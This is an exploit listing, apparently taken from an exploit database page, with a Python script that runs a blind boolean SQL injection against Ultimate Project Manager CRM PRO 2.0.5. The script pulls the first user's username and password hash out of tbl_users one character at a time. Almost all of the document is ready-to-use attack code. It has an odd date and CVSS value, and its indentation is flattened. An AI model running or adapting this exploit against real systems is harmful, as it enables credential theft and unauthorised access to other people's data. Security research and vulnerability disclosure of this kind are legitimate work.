Exploit for Ultimate Project Manager CRM PRO 2.05 SQL Injection

Name: Exploit for Ultimate Project Manager CRM PRO 2.05 SQL Injection
Rating: 5 (664 reviews)
2020-10-20 | CVSS 0.4
## https://sploitus.com/exploit?id=PACKETSTORM:159630
# Exploit Title: Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage  
# Date: 2020-16-09  
# Exploit Author: nag0mez  
# Vendor Homepage: https://ultimatepro.codexcube.com/  
# Version: <= 2.0.5  
# Tested on: Kali Linux 2020.2  
  
  
# The SQLi injection does not allow UNION payloads. However, we can guess usernames and passwords fuzzing the database.  
  
#!/usr/bin/env python3  
#-*- coding: utf-8 -*-  
import requests  
import sys  
  
# The original vulnerability was found on a server with an invalid SSL certificate,  
# which Python could not verify. I added the verify=False parameter to avoid SSL check.  
# The lack of verification results in a warning message from Python.  
# To get a clean output, we will ignore all warnings.  
import warnings  
warnings.filterwarnings("ignore")  
  
host = 'https://testurl.test' # Change  
url = "{}/frontend/get_article_suggestion/".format(host)  
  
chars = '1234567890abcdefghijklmnopqrstuvwxyz'  
hex_chars = 'abcdef1234567890'  
  
def send_payload(payload):  
try:  
response = requests.post(url, data=payload, verify=False)  
content = response.text  
length = len(content)  
return length  
except Exception as e:  
print('Cannot connect to host. Exit.')  
sys.exit(1)  
  
  
def get_first_user():  
found = True  
known = ''  
  
while found:  
  
found = False  
for c in chars:  
test = known + c  
payload = {'search': "' or (select username from tbl_users limit 1)like'{}%'-- ".format(test)}  
length = send_payload(payload)  
  
if length > 2:  
found = True  
known += c  
print(c, end='')  
sys.stdout.flush()  
break  
  
return known  
  
def get_hash(username):  
found = True  
known = ''  
  
while found:  
  
found = False  
for c in hex_chars:  
test = known + c  
payload = {'search': "' or (select password from tbl_users where username='{}' limit 1)like'{}%'-- ".format(username,test)}  
length = send_payload(payload)  
  
if length > 2:  
found = True  
known += c  
print(c, end='')  
sys.stdout.flush()  
break  
  
return known  
  
  
if __name__ == '__main__':  
print('Exploit started.')  
print('Guessing username...')  
  
username = get_first_user()  
  
if username != '':  
print('\nUsername found: {}'.format(username))  
else:  
print('\nCould not get username! Exit.')  
sys.exit(1)  
  
print('Guessing password SHA512 hash...')  
  
sha = get_hash(username)  
  
if sha != '':  
print('\nHash found: {}'.format(sha))  
else:  
print('\nCould not get Hash! Exit.')  
sys.exit(1)